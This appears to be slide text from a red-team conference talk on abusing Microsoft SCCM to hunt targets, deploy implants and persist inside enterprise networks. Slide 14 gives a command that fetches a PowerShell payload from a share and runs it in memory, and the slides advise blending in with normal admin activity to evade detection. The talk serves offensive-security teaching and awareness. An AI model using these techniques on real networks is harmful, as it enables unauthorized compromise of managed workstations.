Matt Nelson - Veris Group's Adaptive Threat Division

1. Red Team Upgrades:
Using SCCM for Malware Deployment

2. @enigma0x3
❖ Penetration Tester and Red Teamer for the Adaptive
Threat Division (ATD) of Veris Group
❖ Active developer on the PowerShell Empire project
❖ Offensive PowerShell advocate
❖ 2nd time speaking!
❖ This con is probably older than I am
❖ Indiana corn farmer turned h4x0r (not really)

3. ❖ What is SCCM and how some admins fail at securing it
❖ Ways to abuse Microsoft’s System Center Configuration
Manager (SCCM) for targeted network compromise.
➢ I’m going to cover targeted, strategic use as opposed to mass pwnage
What this is...

4. Setting the Stage
❖ This talk assumes you have RDP access to a SCCM
server
❖ This talk is focused on abusing SCCM for lateral
movement/persistence in a targeted manner, not
obtaining access to SCCM.
❖ No, having access to SCCM does not mean you own the
enterprise
❖ If you administer SCCM as a domain admin, you fail.

5. What is SCCM?
❖ Platform for distributing packages/applications to clients
❖ Packages, applications and install scripts are hosted on
the SCCM server
❖ Setup and maintained via an agent/server architecture
❖ Consists of a central site server with distribution points.
➢ Agents check in to server periodically to obtain new
packages/applications
❖ Basically acts as internal RAT/C2

6. SCCM in the enterprise
❖ 1 central site server with multiple distribution points
❖ Typically managed via controlled groups
➢ e.g. “SCCM Admins” in AD
❖ Typically setup/configured using a service account to run
the application/push updates
❖ Application contents (*cough, cough install scripts and
notes*) are hosted on a publicly available share
❖ Admins gonna admin

8. Right Click Tools
❖ Add-On that can be installed to assist in client
management tasks
❖ Should be installed on a client such as an administrative
workstation...not on the server
➢ Admins install it on the server anyways
❖ Enables full control of managed endpoints

9. Yep...

10. Why use SCCM in Red Teaming?
❖ Manages a ton of distributed clients
➢ Take control of the server and you have distributed workstation control
➢ SCCM agents are just waiting to run your code
❖ Live off of the land
➢ Keep your malicious implant count low, use SCCM for very targeted
implant distribution
➢ Looks like normal day-to-day traffic/activity
➢ To limit the risk of getting caught, become an admin and not a typical
adversary

11. Why use SCCM in Red Teaming? (cont)
❖ Allows you to identify and strategically group targets
➢ Able to push implants out in a very controlled and surgical manner
❖ Also acts as a persistence mechanism

12. Abusing SCCM: Hunting
❖ Some organizations have user->device mapping
➢ This allows for admins to create specific groups for departments
❖ We can abuse this to hunt for specific users without
generating any additional network/domain traffic

13. Abusing SCCM: Compromise
❖ Create an application/package that utilizes PowerShell for
payload delivery and execution
❖ Do so by creating a PowerShell payload and throw it up
on the public share SCCM uses (typically something like
sccmsource)

14. Abusing SCCM: Compromise
❖ Create a script installer application to fetch and execute
your payload
➢ cmd.exe /c “powershell.exe -c “gc
serverNamesharedFolderApplicationFolderpayload.txt | iex””
❖ Deploy the application to your target group and wait for
the SCCM agents to check in
➢ Payload is fetched over UNC and runs in memory
❖ More here:
➢ https://enigma0x3.wordpress.com/2015/10/27/targeted-workstation-
compromise-with-sccm/

16. Questions and Contact
❖ Feel free to hit me up!
❖ enigma0x3 [at] gmail [dot] com
❖ @enigma0x3 on Twitter and Github
❖ enigma0x3 on Freenode: #psempire
❖ Blog: enigma0x3.wordpress.com

17. References
❖ https://www.trustedsec.com/files/Owning_One_Rule_All_v2.pdf
❖ https://enigma0x3.wordpress.com/2015/10/27/targeted-workstation-
compromise-with-sccm/